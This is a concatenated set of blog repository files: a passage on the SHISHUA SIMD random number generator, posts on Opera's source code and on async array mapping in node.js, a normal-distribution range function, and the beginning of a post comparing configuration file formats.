shuffle\n\n```c\nt0 = _mm256_permutevar8x32_epi32(s0, shu0); t1 = _mm256_permutevar8x32_epi32(s1, shu1);\n```\n\nWe use a 32-bit shuffle because it is the only one that is both a different granularity\nthan the 64-bit operations that we do everywhere else (which breaks 64-bit alignment),\nand that can also cross lanes\n(other shuffles can only move bits within the left 128 bits if they started on the left,\nor within the right 128 bits if they started on the right).\n\nHere are the shuffle constants:\n\n```c\n__m256i shu0 = _mm256_set_epi32(4, 3, 2, 1, 0, 7, 6, 5),\n        shu1 = _mm256_set_epi32(2, 1, 0, 7, 6, 5, 4, 3);\n```\n\nTo make the shuffle really strengthen the output, we move weak (low-diffusion) 32-bit parts\nof the 64-bit additions to strong positions, so that the next addition will enrich them.\n\nThe low 32-bit part of a 64-bit chunk never moves to the same 64-bit chunk as its high part.\nThat way, the two parts do not remain in the same chunk, encouraging mixing between chunks.\n\nEach 32-bit part eventually reaches all positions circularly: A to B, B to C, … H to A.\n\nYou might notice that the simplest shuffles that follow all those requirements\nare simply those two 256-bit rotations (by 96 bits and 160 bits rightward, respectively).\n\n### Third, the addition\n\nLet’s add the 64-bit chunks of the two temporary variables,\nthe shifted one and the shuffled one, together.\n\n```c\ns0 = _mm256_add_epi64(t0, u0); s1 = _mm256_add_epi64(t1, u1);\n```\n\nThe addition is the main source of diffusion: it combines bits\ninto irreducible combinations of XOR and AND expressions across 64-bit positions.\n\nStoring the result of the addition in the state keeps that diffusion permanently.\n\n### Output function\n\nSo, where do we get the output from?\n\nEasy: the structure we built is laid out in such a way that\nwe are growing two independent pieces of state, `s0` and `s1`,\nwhich never 
influence each other.\n\nSo, we XOR them, and get something very random.\n\nIn fact, to increase the independence between the inputs that we XOR,\nwe take the partial results instead: the shifted piece of one state,\nand the shuffled piece of the other.\n\n```c\no = _mm256_xor_si256(u0, t1);\n```\n\nThat also has the effect of reducing the read/write dependencies between superscalar CPU instructions,\nas `u0` and `t1` are ready to be read before `s0` and `s1` are.\n\nYou may have noticed that we did not talk about the counter yet.\nIt turns out we handle it at the start of the loop.\nWe first change the state, and then increment the counter:\n\n```c\ns1 = _mm256_add_epi64(s1, counter);\ncounter = _mm256_add_epi64(counter, increment);\n```\n\nThe reason we change the state first, and then update the counter,\nis so that `s1` becomes available sooner,\nreducing the risk that later instructions that will read it get stalled\nin the CPU pipeline.\nIt also avoids a direct read/write dependency on the counter.\n\nThe reason we apply the counter to `s1` and not `s0`\nis that both affect the output anyway.\nHowever, `s1` loses more bits from the shift,\nso this helps it get back on its feet after that harmful shearing.\n\nThe counter is not necessary to beat PractRand.\nIts only purpose is to set a lower bound of 2<sup>69</sup> bytes = 512 EiB\non the period of the PRNG:\nwe only start repeating the cycle after a millennium at 10 GiB/s,\nwhich is unlikely to ever be too low for practical applications in the coming centuries.\nThanks to this, there are no bad seeds.\n\nHere are the increments:\n\n```c\n__m256i increment = _mm256_set_epi64x(1, 3, 5, 7);\n```\n\nThe increments are picked as odd numbers,\nsince only numbers coprime with the base cover the full cycle of the integers\nmodulo 2<sup>64</sup>, and all odd numbers are coprime with 2.\n\n(In other words, if you increment by an even number among the integers 0 to 3,\nwrapping around to 0 when you go past 3,\nyou get a sequence like 0-2-0-2-…, which never outputs 1 or 3;\nbut an odd increment goes through all integers.)\n\nWe use a different odd number for each 64-bit number in the state,\nwhich makes them diverge more, and adds a tiny bit of stirring.\n\nI picked the smallest odd numbers so that they don’t look like magic numbers.\n\nSo, there we go!\nThat is how the state transition and output function work.\n\n
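Assembled in one plausible order (these are just the snippets above gathered into the loop body, with `u0`, `u1`, `t0`, `t1` as local `__m256i` temporaries), an iteration reads:\n\n```c\n_mm256_storeu_si256((__m256i*)&buf[i], o);       // emit the previous output\ns1 = _mm256_add_epi64(s1, counter);              // stir the counter into s1\ncounter = _mm256_add_epi64(counter, increment);  // advance the counter\nu0 = _mm256_srli_epi64(s0, 1);                   // SHIft\nu1 = _mm256_srli_epi64(s1, 3);\nt0 = _mm256_permutevar8x32_epi32(s0, shu0);      // SHUffle\nt1 = _mm256_permutevar8x32_epi32(s1, shu1);\ns0 = _mm256_add_epi64(t0, u0);                   // Add\ns1 = _mm256_add_epi64(t1, u1);\no  = _mm256_xor_si256(u0, t1);                   // output: mix the two halves\n```\n\n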
Now, how do we initialize the state?\n\n### Initialization\n\nWe initialize the state with the hex digits of Φ,\nthe irrational number that is least approximable by a fraction.\n\n```c\nstatic __uint64_t phi[8] = {\n  0x9E3779B97F4A7C15, 0xF39CC0605CEDC834, 0x1082276BF3A27251, 0xF86C6A11D0C18E95,\n  0x2767F0B153D27B7F, 0x0347045B5BF1827F, 0x01886F0928403002, 0xC1D64BA40F335E36,\n};\n```\n\nWe take a 256-bit seed, which is common in cryptography,\nand doesn’t really hurt in non-cryptographic PRNGs:\n\n```c\nprng_state prng_init(SEEDTYPE seed[4]) {\n  prng_state s;\n  // …\n  return s;\n}\n```\n\nWe don’t want to override a whole piece of state (`s0` or `s1`) with the seed;\nwe only want to affect half.\nThat way, we avoid having debilitating seeds that,\npurposefully or accidentally, set the state to a known weak start.\n\nWith half of each piece of state intact, the seed still controls 128 bits of state,\nwhich is enough entropy to start and stay strong.\n\n```c\ns.state[0] = _mm256_set_epi64x(phi[3], phi[2] ^ seed[1], phi[1], phi[0] ^ seed[0]);\ns.state[1] = _mm256_set_epi64x(phi[7], phi[6] ^ seed[3], phi[5], phi[4] ^ seed[2]);\n```\n\nThen we do the following a `ROUNDS` number of times:\n\n1. Run `STEPS` iterations of SHISHUA,\n2. Set one piece of the state to the other, and the other to the output.\n\n```c\nfor (char i = 0; i < ROUNDS; i++) {\n  prng_gen(&s, buf, 4 * STEPS);\n  s.state[0] = s.state[1];\n  s.state[1] = s.output;\n}\n```\n\nSetting a piece of state to the output increases the diffusion of the state.\nThe added work, and the correlation between state and output, don’t matter here,\nsince this only runs a handful of times, at initialization.\nAll you care about during initialization is diffusion.\n\nI picked values of 5 for `STEPS` and 4 for `ROUNDS`\nafter looking at how much they impacted seed correlation.\n\n(I computed seed correlation by counting the “unusual” and “suspicious” anomalies\ncoming out of the PractRand PRNG quality tool.)\n\n## Performance\n\nSpeed measurement benchmarks are tricky for many reasons.\n\n- **Clock** measurements can lack precision.\n- The CPU has so much **parallelism** that tracking when instructions start and end\n  is both nondeterministic and heavily dependent on other events on the CPU.\n- Obviously, from one CPU vendor to the next, the results will be different.\n  That is also true from one CPU **series** to the next from the same vendor.\n- CPUs nowadays have **[variable frequency]**: they get purposefully slower or faster\n  depending on the need for low power consumption or the risk of high temperature.\n\nI use a dedicated CPU instruction, `RDTSC`, which counts the number of cycles.\n\nTo make sure that everyone can reproduce my results, I use a cloud virtual machine.\nIt doesn’t change the order of the benchmark results compared to a local test;\nit also avoids asking other people to buy the same computer as mine.\nFinally, there are many use-cases where PRNGs run in the cloud on those very instances.\n\nI chose Google Cloud Platform’s N2 (Intel chip) and N2D (AMD chip).\nThe advantage of GCP is that they have chips from both vendors.\nWe’ll focus on Intel here, but the orders of magnitude are similar for AMD.\n\nTo give a bit of context, let’s first look at an old cryptographic generator, RC4.\nImpossible to parallelize; I got **7.5 cpb** (cycles spent per generated byte).\n\n[variable frequency]: 
https://www.intel.com/content/www/us/en/architecture-and-technology/turbo-boost/turbo-boost-technology.html\n[RC4]: http://cypherpunks.venona.com/archive/1994/09/msg00304.html\n[Lehmer128]: https://lemire.me/blog/2019/03/19/the-fastest-conventional-random-number-generator-that-can-pass-big-crush/\n[wyrand]: https://github.com/wangyi-fudan/wyhash/blob/master/wyhash_v6.h\n[Xoshiro256+]: http://prng.di.unimi.it/xoshiro256plus.c\n[RomuTrio]: http://www.romu-random.org/\n[Xoshiro256+ 8 times]: http://prng.di.unimi.it/#speed\n\nNow, let’s look at a very common and fast MCG: [Lehmer128],\nthe simplest PRNG that passes BigCrush: **0.44 cpb**. Wow, not bad!\n\nFor kicks, let’s make another detour through modern cryptographic designs.\nThey rely on a lot of the tricks that we saw.\nTake ChaCha8 for instance.\nIt reaches… **0.46 cpb**! About the same as the really fast one we just saw!\n\nSIMD really works its magic!\n\nTo the cryptographic community, [this is not a complete surprise][djb remarks].\nChaCha8 is just insanely easy to parallelize.\nIt is just a counter in a diffused state, well-hashed.\n\n[djb remarks]: https://twitter.com/hashbreaker/status/1023965175219728386\n\nNext, a recent mixer that is the basis for fast hash tables: [wyrand].\n**0.41 cpb**, slightly better!\n\nAmong Vigna’s fast PRNG, some don’t pass 32 TiB of PractRand, but are very fast.\n[Xoshiro256+] fails at 512 MiB but is among the fastest of the bunch: **0.34 cpb**.\n\nLet’s look at a recent entry, from earlier this year: [RomuTrio].\nIt claims the title of fastest PRNG in the world: **0.31 cpb**.\n\nAlright, enough. How does SHISHUA-half fare?\n\n**0.14 cpb**. Twice as fast as RomuTrio.\n\n\n\nGiven its quality, it is unmatched.\n\nBut remember how the Julia team looked at\ncombining multiple instances of Vigna’s design\nto make a fast SIMD PRNG?\nLet’s look at Vigna’s fastest result using this technique:\n[Xoshiro256+ 8 times]. 
**0.07 cpb**!\n\n(Technically, it varies with the machine;\non my laptop, SHISHUA-half is faster than this.)\n\n---\n\nSure, the resulting meta-PRNG (which I dub Xoshiro256+x8)\nhas *terrible statistical biases* that fail many simple tests.\n\nBut let’s beat its speed anyway, without betraying our high quality standards.\n\nNow you can probably guess why we called our earlier primitive SHISHUA-half.\n\nIt turns out getting twice as fast is easy: double SHISHUA-half.\n\nSimilar to the Julia insights, we have two PRNGs initialized differently\n(four blocks of 256-bit state),\noutputting their results one after the other.\n\nBut with more state, we can output even more\nby combining the four states pairwise:\n\n```c\no0 = _mm256_xor_si256(u0, t1);\no1 = _mm256_xor_si256(u2, t3);\no2 = _mm256_xor_si256(s0, s3);\no3 = _mm256_xor_si256(s2, s1);\n```\n\nAnd that is how you get SHISHUA, and its **0.06 cpb** speed.\n\nFive times faster than the previously fastest PRNG in the world\nthat passes 32 TiB of PractRand.\nYou can barely see it in the graph, so I removed RC4.\n\n\n\nI guess my point is that it is somewhat competitive.\n\n(In fact, it is even faster on my laptop, at 0.03 cpb,\nbut I want to stick to my benchmark promises.\nMaybe we lose a tiny bit of performance on early AVX-512 CPUs.)\n\nHopefully, SHISHUA stays the fastest in the world for at least a few weeks?\n(Please make it so.)\n\n## Quality\n\nIt passes BigCrush and 32 TiB of PractRand without suspicion.\n\nIn fact, all four of its outputs do.\n\nOne of the not-ideal aspects of the design is that SHISHUA is **not reversible**.\n\nYou can see this with a reduction to a four-bit state, with `s0 = [a, b]` and `s1 = [c, d]`.\nThe shift will yield `[0, a]` and `[0, d]`; the shuffle will give `[b, c]` and `[d, a]`.\n\nThe new `s0` is `[b, c] + [0, a] = [b⊕(a∧c), a⊕c]`, and `s1` is `[d, a] + [0, c] = [d⊕(a∧c), a⊕c]`.\n\nIf `a = ¬c`, then `a⊕c = 1` and `a∧c = 0`, thus `s0 = [b, 1]` and `s1 = [d, 1]`.\nSo there are two combinations of `a` and `c` that give the same final state.\n\nIt is not an issue in our case, because the 64-bit counter is also part of the state.\nSo you have a minimum cycle of 2⁷¹ bytes (128 bytes per state transition),\nwhich lasts seven millennia at 10 GiB/s.\nThat counterbalances the lost states.\n\nBesides, even despite the irreversibility,\nthe average state transition period is `2^((256+1)÷2)`.\nThat gives an average cycle of 2¹³⁵ bytes\n(more than a trillion times the age of the universe to reach at 10 GiB/s).\nAlthough, in my opinion, average cycles are overrated,\nas they give no indication of the quality of the output.\n\nAlright, here is the distilled benchmark:\n\n<table id=benchmark>\n <tr><th>Name <th>Performance <th>Quality <th>Seed correlation\n <tr><td>SHISHUA <td>0.06 <td>>32 TiB <td> >32 TiB\n <tr><td>xoshiro256+x8 <td>0.07 <td> 1 KiB <td> 0 KiB\n <tr><td>RomuTrio <td>0.31 <td>>32 TiB <td> 1 KiB\n <tr><td>xoshiro256+ <td>0.34 <td>512 MiB <td> 1 KiB\n <tr><td>wyrand <td>0.41 <td>>32 TiB <td> 32 KiB\n <tr><td>Lehmer128 <td>0.44 <td>>32 TiB <td> 1 KiB\n <tr><td>ChaCha8 <td>0.46 <td>>32 TiB?<td> >32 TiB?\n <tr><td>RC4 <td>8.06 <td> 1 TiB <td> 1 KiB\n</table>\n\n1. **Performance**: in number of CPU cycles spent per byte generated,\n   on N2 GCP instances. On N2D (AMD), the order is the same.\n2. **Quality**: level at which it fails PractRand. We show a `>` if it did not fail.\n   We put a question mark if we have not proved it.\n3. 
**Seed correlation**: PractRand on an interleaving of bytes from eight streams\n   with seeds 1, 2, 4, 8, 16, 32, 64, 128.\n   We use PractRand with folding 2 and expanded tests.\n\nSpeed measurement is traditionally in cpb.\nGiven the speeds we reach nowadays,\na more appropriate measurement is the number of bits generated per CPU cycle.\nNot only do I find it easier to grasp,\nit also makes huge differences much easier to compare on the graph:\n\n\n\n## Next\n\nWhile there are no practical issues with irreversibility in our case,\nit also means that we can improve on SHISHUA.\n\nMy ideal PRNG would have the following properties:\n\n1. **The state transition is a circular permutation**, giving a way-more-than-enough cycle of 2¹⁰²⁴ bytes.\n   As in, it would take more than 10²⁸² times the age of the universe to reach the end at 10 GiB/s,\n   instead of SHISHUA’s seven millennia.\n   It is not exactly “better” (impossible is impossible);\n   but if we can reduce the design to a smaller state without affecting diffusion,\n   we might be able to get a faster PRNG.\n   Do you think we might be able to fit one in ARM’s 128-bit NEON registers?\n   Also, we would no longer need the counter, removing two additions.\n2. **The output function is provably irreversible**.\n   The way SHISHUA XORs two independent numbers already has that property,\n   but I haven’t proved that the numbers are truly decorrelated.\n3. **The state initialization is irreversible**,\n   with each state having 2¹²⁸ possible seeds (to prevent guessing the seed).\n   The way SHISHUA sets the state to its own output is likely irreversible.\n   After all, it uses SHISHUA’s state transition (partially irreversible)\n   and its output function (seemingly irreversible, see point 2).\n4. **The state initialization has perfect diffusion**:\n   all seed bits affect all state bits with equal probability.\n   I’d like to compute that for SHISHUA.\n\nOne issue holding back PRNGs and cryptography overall is the lack of better, general-purpose tooling.\n\nI want a tool that can instantly give me an accurate score,\nallowing me to compare designs on the spot.\n\nPractRand is great compared to what came before it; but:\n\n- It cannot rate high-quality generators, making comparisons between them impossible.\n  We just get to say “well, they both had no anomalies after 32 TiB…”\n- It takes weeks to run…\n\nI believe great improvements are coming.\n\n---\n\nDiscussions on\n[Reddit](https://www.reddit.com/r/prng/comments/g3nh4i/shishua_the_fastest_prng_in_the_world/)\nand\n[Hacker News](https://news.ycombinator.com/item?id=22907539)\n.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n  \"@type\": \"BlogPosting\",\n  \"datePublished\": \"2020-04-18T16:59:00Z\",\n  \"keywords\": \"prng, crypto\" }\n</script>\n"
},
{
"alpha_fraction": 0.7101505398750305,
"alphanum_fraction": 0.7371671199798584,
"avg_line_length": 40.790321350097656,
"blob_id": "f3c28409ee8202f0b16f54e77c8362d57cd3d5aa",
"content_id": "feed0a987942c1dd2e105699702cc003bb70fbe1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2595,
"license_type": "no_license",
"max_line_length": 441,
"num_lines": 62,
"path": "/blog/src/opera-an-open-source-browser.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Opera, an Open-Source Browser?\n\nI honestly do hope I am not hereby embracing [Betteridge's law of headlines](http://en.wikipedia.org/wiki/Betteridge). Please believe me.\n\nEver since the switch to Chromium away from Presto, I have eagerly waited for the first public snapshot. I expected to get my hands on the code by then.\n\nIt is their right to not give direct access to the code, though. The fact that they chose to use that right should not make me suspicious. All I had to do, after all, was [email their open-source address](https://twitter.com/opera/status/339658208656375808), <opensource>. What happened then was rather odd.\n\nBut let's get the facts as they happened. I sent them a mail on May 30th.\n\n> Good morning / afternoon / evening / night,\n>\n> I wish to get a copy of the source code for Opera.\n> May I?\n> Thanks in advance.\n>\n> Yours sincerely,\n> Thaddée Tyl.\n\nThey answered later that day,\n\n> Dear Thaddée Tyl,\n>\n> We have received your request, and information on how to get access will be sent to\n> via email as soon as we have source package ready.\n>\n> --\n> Kind regards,\n> Haakon\n> Opera Software\n> <http:></http:>\n\nAnd I waited. Two weeks. Then:\n\n> Good morning / afternoon / evening / night,\n>\n> I am unsure what the situation is on your side related to my\n> two-weeks-old request, so I decided to ask you. Is the process of\n> preparing the tarball of Opera's source ongoing? Have you lost my\n> email address?\n>\n> Yours sincerely,\n> Thaddée Tyl.\n\nTheir answer:\n\n> This is the mail system at host smtp-new.opera.com.\n> I'm sorry to have to inform you that your message could not\n> be delivered to one or more recipients. It's attached below.\n> […]\n> <opensource>: User unknown in virtual alias table\n\nSure, their old [FAQ](http://business.opera.com/press/faq/) still insists that they are not planning to go open-source. From a legal standpoint, they can. Chromium is released under the [BSD license](http://src.chromium.org/viewvc/chrome/trunk/src/LICENSE), which allows them to keep their fork proprietary — at least, that is my understanding. But then, don't say [you went open-source](https://twitter.com/opera/status/339658208656375808)!\n\nUPDATE: Opera [responded](https://twitter.com/opera/status/345616182738554883). They didn't delete <opensource> (phew!), but they are moving mail servers. Also, they are still working on packaging the source for the desktop. </opensource></opensource></opensource>\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2013-06-14T19:01:00Z\",\n \"keywords\": \"web\" }\n</script>\n"
},
{
"alpha_fraction": 0.6693310141563416,
"alphanum_fraction": 0.6788569092750549,
"avg_line_length": 50.02234649658203,
"blob_id": "60310ee302519a5e6dbe437c52383dbf014c4cb2",
"content_id": "5c72ed36d912306cf700136b4096129a15eea8ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 9141,
"license_type": "no_license",
"max_line_length": 881,
"num_lines": 179,
"path": "/blog/src/array-processing-in-event-loops.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Array Processing In Event Loops\n\nMuch has been said about the use of event loops in JavaScript, especially because of their extensive use in node.js. Much has been said about how coroutines could help avoid the pyramid of doom that the event loop constructs causes.\n\n f(function(g) {\n g(function(h) {\n h(function() {\n ...\n });\n });\n });\n\nDave Herman [argues](http://calculist.org/blog/2011/12/14/why-coroutines-wont-work-on-the-web/) that coroutines cannot work in the web because it makes any function call a potential preemption point that might use multiple event loop cycles before completion. That's the whole spirit (and danger) of `yield` in coroutines. This old Racket hacker would rather have `call/cc` (call with current continuation), a Scheme mechanism that allows to save the completion of a function into some sort of function variable that you can then run whenever you want. For the next version of the ECMAScript standard, however, he settles for generators, which are much safer than coroutines, while providing similar (albeit not nearly as powerful) constructs. The basic difference is that a generator cannot suspend the function that called it: in this respect, it feels a lot like a stateful function.\n\nBefore that, Vyacheslav Egorov [published a rant](https://plus.google.com/111090511249453178320/posts/LB6LAk3fPUy) in which he points out that, while indeed coroutines do not make it obvious that they don't necessarily run to completion, (since they are syntactically the same as functions), the equivalent, \"spaghetti code\", node.js construct for non-blocking I/O raises a similar concern. Callbacks can either be run in the same event loop cycle as the function that is calling them, or they can be run several spins away. Shared state between the closure and the function it is nested in is hence insecure. It can be easily manipulated wrong.\n\nOne such case that I found while using node.js' APIs is while processing arrays.\n\nHad the solution been too obvious to need any help, or too specific to be generally corrected, I wouldn't have raised my voice. The thing is, I believe it is time to have constructs such as the one I will present, either in node.js' library, or directly in ECMAScript.\n\n[Small note: if you'd rather read highlighted code than a whole article, [here](https://gist.github.com/1640136) is a fine place to be.]\n\nFor the purpose of the argument, let's first create a function that, just like those in node.js, takes a function callback as an argument, but only runs it several event loop cycles later.\n\n function differedFactorial(n /* Number */, cb /* Function */) {\n if (n < 0) cb(new Error('Complex infinity'));\n setTimeout(function() {\n var result = 1;\n for (; n > 1; n--) {\n result = result * n;\n }\n cb(result);\n }, 300);\n }\n\nWhen you know you have such a function, you must be careful how you use it.\n\nSuppose you have an array of numbers. You want them processed by our `differedFactorial` function. You may think that you can map the array at first. How wrong.\n\n var a = [2, 4, 6, 9];\n console.log(a.map(function(e) {\n var result;\n differedFactorial(e, function(res) {\n result = res;\n });\n return result;\n }));\n\nThe result you get is an array of four `undefined` values.\n\nWhy is that?\n\nThe basic issue is that you run through the `map` function. When the `differedFactorial` function is hit, its callback is not run. 
As a result, what we return is a value that has not yet been assigned, `undefined`.\n\nHow can we make it work?\n\nWe can construct a new map function that accommodates the callback system. Let's try a first draft of such a function.\n\n Array.prototype.asyncMap = function(f /* Function */, cb /* Function */) {\n var l = [], len = this.length;\n for (var i = 0; i < len; i++) {\n f(this[i], i, this, function(e) {\n l.push(e);\n if (l.length === len) {\n cb(l);\n }\n });\n }\n };\n\n a.asyncMap(function(e, i /* Number */, a /* Array */, cb /* Function */) {\n differedFactorial(e, function(res) { cb(res); });\n }, function(result) {\n console.log(result);\n });\n\nThis seems to work, at first sight. Inside the array that we construct, the length property tells us when to return the result.\n\nHowever, an important contract that we make with the user is that, in all cases, he must call asyncMap’s callback once for each element that is processed by differedFactorial. Otherwise, we will never return anything, and there will be no warning, exception or whatsoever.\n\nBut even in this implementation, there remains an important issue. In order to make this issue obvious, let’s construct a derived differedFactorial.\n\n function differedFactorial(n /* Number */, cb /* Function */) {\n if (n < 0) cb(new Error('Complex infinity'));\n setTimeout(function() {\n var result = 1;\n for (; n > 1; n--) {\n result = result * n;\n }\n cb(null, result); // No errors, result is given.\n }, 150 + Math.abs(300 * Math.random()));\n }\n\n\nThis time, the dummy non-blocking cross-cycle function probably won't return values in order. Indeed, it runs the callback after a random amount of time.\n\nAs a result, the order of the elements in the returned list is not that of the elements in the list we passed in.\n\nThe following function preserves order. An interesting side-effect is that, while it does allocate more than the previous implementation (because of that `processing` variable), it takes just as long to compute.\n\n Array.prototype.asyncOrderedmap = function(f /* Function */,\n cb /* Function */) {\n var processing = 0,\n l = new Array(this.length),\n len = this.length;\n for (var i = 0; i < len; i++) {\n f(this[i], i, this, function(e, idx) {\n l[idx] = e;\n processing++;\n if (processing === len) {\n cb(l);\n }\n });\n }\n };\n\nAn additional requirement on the user is that, whenever he sends a processed value from the array, he must also indicate its index.\n\n a.asyncOrderedMap(function(e,\n i /* Number */,\n a /* Array */,\n cb /* Function */) {\n // The callback has one more argument, the index.\n differedFactorial(e, function(res) { cb(res, i); });\n }, function(result) {\n console.log('asyncOrderedMap: %s', result);\n });\n\nThis algorithm is not trivial. I used to write it directly, with no function to help me. It seemed only too obvious. But I was wrong, because I assumed too much.\n\nFor instance, I had to track down a very strange bug that only occurred in certain conditions. That bug was present in real code, but as soon as I tried to test the segment of code that I knew was buggy, then that particular piece of code worked perfectly.\n\nThe issue was that the length of the array varied whilst I was processing it. Indeed, since processing took more than one event loop cycle, another piece of code was sometimes adding new elements to it. 
The only thing that made it break is that I only stopped processing the array when the length of the new array matched the planned length that I had calculated at the beginning. Of course, once one element had been added to the original array, the new array would never reach the length of the original array, since it was topped by the length initially calculated.\n\nHad I used `asyncOrderedMap`, it would have spared me a lot of debugging time.\n\nMy point is that the Event-Loop model has bad parts, but they can easily be overcome by completing the standard library.\n\nBeginners in node.js struggle with those bad parts. They wouldn’t if an asynchronous library was added to the built-in libraries in node.js.\n\nThere is a such library, amongst the npm modules, that I have found quite good. It frees the user from one of the contracts of asyncOrderedMap: we don’t have to give the index of the current element to the callback. They achieve that by adding state to the list we give them.\n\nTry it today.\n\nInstall it with:\n\n npm install async\n\nYou can check that it solves the problem presented here quite fine:\n\n var async = require('async');\n\n function differedFactorial(n /* Number */, cb /* Function */) {\n if (n < 0) cb(new Error('Complex infinity'));\n setTimeout(function() {\n var result = 1;\n for (; n > 1; n--) {\n result = result * n;\n }\n cb(null, result); // No errors, result is given.\n }, 150 + Math.abs(300 * Math.random()));\n }\n \n var a = [2, 4, 6, 9];\n async.map(a, differedFactorial, function(err, res) {\n console.log(res);\n });\n\nMoreover:\n\n- if you are part of the core development team at `node.js`, include it.\n- if you are not, beg them to do so!\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2012-01-21T18:29:00Z\",\n \"keywords\": \"\" }\n</script>\n"
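Neither draft above reports errors. Here is a sketch of the ordered map with node-style error propagation; the name and the `(err, value, index)` callback contract are mine, not part of the original post:

    // Like asyncOrderedMap, but bails out on the first error.
    // Each worker must call its callback exactly once, with
    // (err, value, index).
    Array.prototype.asyncOrderedMapErr = function(f /* Function */,
                                                  cb /* Function */) {
      var done = 0, failed = false;
      var l = new Array(this.length), len = this.length;
      if (len === 0) { return cb(null, l); }
      for (var i = 0; i < len; i++) {
        f(this[i], i, this, function(err, e, idx) {
          if (failed) { return; }  // An earlier element already failed.
          if (err) { failed = true; return cb(err); }
          l[idx] = e;
          done++;
          if (done === len) { cb(null, l); }
        });
      }
    };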
},
{
"alpha_fraction": 0.6468647122383118,
"alphanum_fraction": 0.6578657627105713,
"avg_line_length": 33.96154022216797,
"blob_id": "ffe88ce57353405546133719fc19afbbfd2e3013",
"content_id": "2ad04c2cf99600007d9534094f2b5d75701e547c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 913,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 26,
"path": "/blog/assets/mean-range-of-a-bell-curve-distribution/normal-mean-range.js",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "// Compute the mean range and its extrema for a Normal (Gaussian) distribution.\n//\n// This code depends on https://github.com/cag/mp-wasm.\n\n// Compute the range of a normal distribution.\n// In other words, the max an min of the set of likely (≥ `prob`) values\n// among `samples` real-valued numbers\n// taken from a Gaussian random variable.\n// The Gaussian distribution’s parameters are its `mean` and `variance`.\nfunction normalRange(mean, variance, samples, prob = .5, mpf = this.mpf) {\n const m = mpf(mean);\n const s2 = mpf(variance);\n const g = mpf(prob);\n const pi = mpf.getPi();\n\n const halfRange = mpf.sqrt(\n mpf(-2).mul(s2).mul(mpf.log(\n mpf.sqrt(mpf(2).mul(s2).mul(pi))\n .mul(mpf(1).sub(mpf.pow(\n mpf(1).sub(g), mpf(1).div(mpf(samples))))))));\n const min = m.sub(halfRange);\n const max = m.add(halfRange);\n const range = halfRange.mul(2);\n\n return { min, max, range };\n}\n"
},
{
"alpha_fraction": 0.7211222648620605,
"alphanum_fraction": 0.7313922643661499,
"avg_line_length": 74.55999755859375,
"blob_id": "287f9e453f5d4f413dddccf3097f8a50e7008e24",
"content_id": "91ecb5a843b1ab1e8771493ecc211b11f09dd646",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 9455,
"license_type": "no_license",
"max_line_length": 527,
"num_lines": 125,
"path": "/blog/src/a-history-of-settings-file-format-and-dotset.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# A History of Settings File Format, and dotset\n\nThe landscape for configuration formats is quite poor.\n\nThere is a lot of choice, but each pick has substantial flaws.\nThere is no fairer portrait than that which Wikipedia paints:\n\n- The **INI** file format is a de facto standard for configuration files.\n- **.properties** is a file extension for files mainly used in Java related technologies to store the configurable parameters of an application.\n- **JSON** provides a syntax which is easier to parse than the one typically adopted for INI file formats, and also offers support for data types and data structures\n- **YAML** is used by some for more complex configuration formats.\n- **Plist** is the standard configurations file format for Cocoa Applications.\n\nLet me go through them one by one.\n\n | comments | maps in lists | simplicity |\n ------------+----------+---------------+------------+\n .properties | x | | x |\n INI | x | | x |\n Plist | | x | x |\n XML | x | x | |\n JSON | | x | x |\n TOML | x | | x |\n DotSet | x | x | x |\n \n Comments, maps in lists, simplicity: pick two.\n\nThe INI file format is a simple way to store some information.\nDid I mention it is simple? It is *very simple*.\nYou have a dictionary map at the top level, and in there, another map.\nEach keys of that second map have string values.\n\nAre the keys case-sensitive? Maybe. Does it have comments? Maybe, either hashed `#` or Lisp-like `;`. What is the delimiter between keys and values? I don't know, it's usually `=`, but sometimes `:`. See the problem? It is non-standard. Even if it was, you can't do much with it.\nLimited data structures are limited.\n\nDotProperties are even simpler than INI files, if you can believe it. (I cannot.) You are left with a single map from string keys to string values, and you have comments. On the plus side, it is pretty standard…\n\nPlists used to be a [beautiful, lightweight format](https://developer.apple.com/library/mac/#documentation/Cocoa/Conceptual/PropertyLists/OldStylePlists/OldStylePLists.html#//apple_ref/doc/uid/20001012-BBCBDBJE): simple, easy to read, it has all the data structures of JSON, or close enough. It even has easy binary data as hexadecimal sequences, and dates! Truly, if Apple had worked to make it ubiquitous, JSON would never have been needed. It has all of its power, and all of its irritating things.\n\nYet, plist would have lost against INI. \nWhy? Comments.\nComments actually serve as documentation.\nA textual file is not just great because you can use your preferred text editor, it is great because you can *read* it.\nComments are not just for programming languages:\nthey have their place inside data, too.\nPlist simply forgot to add comments.\n\nAnyway, Apple killed the Plist format, replacing it with XML. The data structures are the same, but now the parsers need to be extra smart.\nThe addition of boilerplate made the files so big that Apple even added an equivalent binary format.\nToo bad, the XML form is [here to stay](https://github.com/search?q=.plist).\n\nOn to XML, then. 
